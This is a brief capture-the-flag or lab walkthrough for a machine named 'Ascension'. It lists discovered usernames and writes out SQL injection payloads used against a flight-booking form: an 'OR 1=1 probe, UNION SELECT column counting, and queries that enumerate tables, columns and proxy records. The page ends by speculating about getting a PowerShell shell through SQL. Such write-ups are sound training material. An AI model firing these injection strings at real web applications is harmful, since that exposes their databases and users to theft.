✈️Ascension

We first discover a web page on port 80:

We discover some possible users:

-Nikolai Belinski
-Tank Dempsey
-Edward Richtofen
-Takeo Masaki
-Fanny Spencer

On the "book flight" page we quickly discover the following input that seems vulnerable to SQLi:

We are able to trigger the following error with a simple 'OR 1=1-- -

So maybe we can retrieve some information this way. We follow the path of the SQLI and try to use UNION 

' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -

With the following payload, we are able to retrieve the table names:

' UNION SELECT NULL,table_name,NULL,NULL,NULL FROM information_schema.tables--
' UNION SELECT NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='proxies'--

So we found the column names for proxies:

' UNION SELECT proxy_id,proxy_name,subsystem_name,NULL,NULL FROM proxies--

So could this mean that a user called svc_dev can run a cmd and PowerShell? From this information, we could imagine that we need to obtain a shell by executing a PowerShell script via an SQL request?

PreviousEndgamesNextCRTP

Last updated